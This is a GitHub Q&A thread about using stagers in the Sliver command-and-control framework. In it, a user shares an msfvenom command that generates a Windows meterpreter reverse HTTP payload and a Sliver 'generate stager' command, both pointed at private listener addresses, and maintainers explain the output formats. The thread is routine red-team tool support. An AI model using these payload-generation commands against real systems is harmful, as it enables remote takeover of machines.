### DISCUSSION TITLE
Struggling to figure out how to use stager

### DISCUSSION THREAD

**Discussion by Ayantaker** [BishopFox/sliver#422] [Q&A]
Hi, i have been trying to use the stager-listener feature that you guys have in your framework. I was following this wiki page https://github.com/BishopFox/sliver/wiki/Stagers . What I can't figure out is how to execute the stager that is generated using the generate stager command on windows. I can see there are format options where you can specifiy format like ruby and powershell, but not really sure how to make it work, like all its generating is a bytestring which is assigned to a buf variable. Any help would be awesome. thanks! and sorry if the question is too basic.

**Comment by moloch--** [comment]
Sliver uses the same staging protocol at Metasploit, when you use `generate stager` it's actually just calling Metasploit to generate a stager for you.

So usage would be identical to Metasploit stagers, which boils down to you use the generated stager code differently depending on the language/format you specified.

**Reply by Ayantaker** [reply]
When I generated a metasploit powershell paylaod using msfvenom with the following command  - `msfvenom -p windows/x64/meterpreter_reverse_http -f psh –o ~/meterpreter-64.ps1 LHOST=192.168.19.129`
I get the payload structured like the screenshot below, where er have the usual buffer and some process creation code along with it.

![image](https://user-images.githubusercontent.com/38920001/116980016-58a9aa80-ace3-11eb-8b55-5e574faec144.png)


But when I generate powershell based stager with Sliver with the following command  - `generate stager --lport 8080 --lhost 192.168.19.131 --format ps1 --save .`
I get only the buffer (screenshot below), the extra code present with msfvenom payload is missing. Are we supposed to add it ourself.

![image](https://user-images.githubusercontent.com/38920001/116980154-8262d180-ace3-11eb-8cbc-845951f2f6dc.png)

Thanks!

**Reply by moloch--** [reply]
Let me look into this, we may have a bug here, but depending on the output format you may need to write your own "executor" we only generate the shellcode in the requested format.

**Reply by lesnuages** [reply]
@Ayantaker you need to use the `psh` value for the `--format` flag to get the same output, not `ps1`.
